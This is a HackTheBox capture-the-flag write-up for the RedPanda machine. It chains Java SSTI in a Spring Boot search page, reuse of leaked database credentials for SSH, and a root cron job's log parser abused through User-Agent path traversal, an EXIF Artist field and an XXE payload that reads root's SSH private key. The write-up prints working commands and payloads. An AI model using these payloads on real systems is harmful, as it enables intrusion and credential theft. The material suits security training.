RedPanda - [HTB]

Cover Image for RedPanda - [HTB]

Table of Contents


    RedPanda is an easy Linux machine from HackTheBox where the attacker will have to find a Java SSTI on a search engine. Then, it will have to analyse a Java program, which is being executed every two minutes by root. Finally, it has to exploit an XXE vulnerability to obtain the root's SSH private key.


    As always, let's start finding all opened ports in the machine with Nmap.

    kali@kali:~/Documents/HTB/RedPanda$ sudo nmap -v -sS -p- -n -T4 -oN AllPorts.txt
    Nmap scan report for
    Host is up (0.11s latency).
    Not shown: 65533 closed tcp ports (reset)
    22/tcp   open  ssh
    8080/tcp open  http-proxy
    Read data files from: /usr/bin/../share/nmap
    # Nmap done at Sun Jul 31 11:58:30 2022 -- 1 IP address (1 host up) scanned in 112.88 seconds

    Then, we continue with a deeper scan of every opened port, getting more information about each service.

    kali@kali:~/Documents/HTB/RedPanda$ portsDepth 22,8080
    Starting Nmap 7.92 ( ) at 2022-07-31 12:00 EDT
    Nmap scan report for
    Host is up (0.11s latency).
    22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
    |   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
    |_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
    8080/tcp open  http-proxy
    |_http-title: Red Panda Search | Made with Spring Boot 

    At port 8080, there is a little search engine for different types of pandas made with Spring Boot.

    Panda search

    Furthermore, through some file enumeration, appears a statistics page.

    kali@kali:~/Documents/HTB/RedPanda$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -of md -o ffuz.txt -t 60 -u
    stats                   [Status: 200, Size: 987, Words: 200, Lines: 33]

    On this page, the statistics of the authors woodenk and damian can be obtained and exported in XML format.


    Finally, the Greg panda appears if no input is inserted, telling that the search engine might be vulnerable to injection attacks.

    Greg Panda

    After fuzzing the search engine using the wordlist special-chars.txt from SecLists and URL encoding its characters, the following output is obtained.

    Special chars 1

    Because the characters ){}\% produced errors when sent to the server, and the characters ~$_ are banned for the engine, it might be vulnerable to SSTI.

    To verify that, the following payload was used §character§{7*7} (encode characters before executing intruder). As a result, it seems that the code inside *{<CODE>} is being executed.

    Ban characters bypass


    Then, because Spring boost is made with Java, STTI Java payloads are needed. These payloads can be found on PayloadAllTheThings.

    Java STTI

    Because this payload requires encoding every single character to be executed, to facilitate the work, the tool SSTI-PAYLOAD is used.

    Note: I changed the script to always return *{ instead of ${.

    kali@kali:~/Documents/HTB/RedPanda/ssti-payload$ python 
    Command ==> whoami
    Whoami STTI

    Because no reverse shell can be obtained, manual enumeration of the machine must be performed using the web form.

    # cat /opt/panda_search/src/main/java/com/panda_search/htb/panda_search/

    Looking inside the Panda search source code, there are some database credentials.

        public ArrayList searchPanda(String query) {
            Connection conn = null;
            PreparedStatement stmt = null;
            ArrayList&lt;ArrayList&gt; pandas = new ArrayList();
            try {
                conn = DriverManager.getConnection(&quot;jdbc:mysql://localhost:3306/red_panda&quot;, &quot;woodenk&quot;, &quot;RedPandazRule&quot;);
                stmt = conn.prepareStatement(&quot;SELECT name, bio, imgloc, author FROM pandas WHERE name LIKE ?&quot;);
                stmt.setString(1, &quot;%&quot; + query + &quot;%&quot;);
                ResultSet rs = stmt.executeQuery();
                    ArrayList&lt;String&gt; panda = new ArrayList&lt;String&gt;();
            }catch(Exception e){ System.out.println(e);}
            return pandas;

    These credentials can be used for getting access to the machine through SSH, obtaining the user flag.

    kali@kali:~/Documents/HTB/RedPanda/$ ssh woodenk@
    woodenk@'s password: RedPandazRule
    woodenk@redpanda:~$ cat user.txt 

    Privilege Escalation

    Using pspy we can see that every two minutes the Java file final-1.0-jar-with-dependencies.jar is being executed as root.

    2022/07/31 17:22:01 CMD: UID=0    PID=1      | /sbin/init maybe-ubiquity 
    2022/07/31 17:22:01 CMD: UID=0    PID=3337   | /usr/sbin/CRON -f 
    2022/07/31 17:22:01 CMD: UID=0    PID=3338   | /bin/sh -c /root/ 
    2022/07/31 17:22:01 CMD: UID=0    PID=3339   | /bin/sh /root/ 
    2022/07/31 17:22:01 CMD: UID=0    PID=3340   | java -jar /opt/credit-score/LogParser/final/target/final-1.0-jar-with-dependencies.jar

    This Java application file has the source code located at /opt/credit-score/LogParser/final/src/main/java/com/logparser/ .

    Starting from the main function, we can see that it reads the log file /opt/panda_search/redpanda.log, parses some data and then reads an XML file.

    public static void main(String[] args) throws JDOMException, IOException, JpegProcessingException {
        File log_fd = new File("/opt/panda_search/redpanda.log");
        Scanner log_reader = new Scanner(log_fd);
        while (log_reader.hasNextLine()) {
          String line = log_reader.nextLine();
          if (!isImage(line))
          Map parsed_data = parseLog(line);
          String artist = getArtist(parsed_data.get("uri").toString());
          System.out.println("Artist: " + artist);
          String xmlPath = "/credits/" + artist + "_creds.xml";
          addViewTo(xmlPath, parsed_data.get("uri").toString());

    A look at the log parser; the program splits a log line into a string using || as a separator. So, because the attacker has control over the User-Agent HTTP parameter, the uri value can be overwritten.

    # cat redpanda.log 
    # 200||||Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0||/search
    public static Map parseLog(String line) {
        String[] strings = line.split("\\|\\|");
        Map map = new HashMap<>();
        map.put("status_code", Integer.parseInt(strings[0]));
        map.put("ip", strings[1]);
        map.put("user_agent", strings[2]);
        map.put("uri", strings[3]);
        return map;

    The uri value is used in the function getArtist, appending the value to an image path for reading the Artist metadata attribute.

    public static String getArtist(String uri) throws IOException, JpegProcessingException
        String fullpath = "/opt/panda_search/src/main/resources/static" + uri;
        File jpgFile = new File(fullpath);
        Metadata metadata = JpegMetadataReader.readMetadata(jpgFile);
        for(Directory dir : metadata.getDirectories())
            for(Tag tag : dir.getTags())
                if(tag.getTagName() == "Artist")
                    return tag.getDescription();
        return "N/A";

    Finally, the artist value is appended to another path, which is being used at the function addViewTo.

    This function reads the file, updates the counter of each image view and then overwrites the file with the new values.

    public static void addViewTo(String path, String uri) throws JDOMException, IOException
        SAXBuilder saxBuilder = new SAXBuilder();
        XMLOutputter xmlOutput = new XMLOutputter();
        File fd = new File(path);
        Document doc =;
        Element rootElement = doc.getRootElement();
        for(Element el: rootElement.getChildren())
            if(el.getName() == "image")
                    Integer totalviews = Integer.parseInt(rootElement.getChild("totalviews").getText()) + 1;
                    System.out.println("Total views:" + Integer.toString(totalviews));
                    Integer views = Integer.parseInt(el.getChild("views").getText());
                    el.getChild("views").setText(Integer.toString(views + 1));
        BufferedWriter writer = new BufferedWriter(new FileWriter(fd));
        xmlOutput.output(doc, writer);

    Because there is no measure to avoid XXE and we have control over the parameters user_agent, uri ,artist and xmlPath; maybe we can create an XML file with XXE to read the root's private key.

    First, obtain an image and update its metadata.

    exiftool -Artist="../tmp/marmeus"  greg.jpg

    Then, we need to edit a statistics XML file to add the XXE payload.

    wget '' -O marmeus_creds.xml
    cat marmeus_creds.xml
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///root/.ssh/id_rsa"> ]>

    Finally, update all the files and send a request with the malicious user agent.

    scp marmeus_creds.xml greg.jpg woodenk@
    curl -A 'Firefox||/../../../../../../../tmp/greg.jpg'

    After two minutes, the script will be executed, and the XML will be modified, adding the root's private key.

    woodenk@redpanda:/tmp$ cat marmeus_creds.xml
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE replace>
        <hello>-----BEGIN OPENSSH PRIVATE KEY-----
    -----END OPENSSH PRIVATE KEY-----</hello>

    Finally, it is possible to access the machine as root, obtaining the root flag.

    kali@kali:~/Documents/HTB/RedPanda$ ssh -i id_rsa root@
    root@redpanda:~# cat root.txt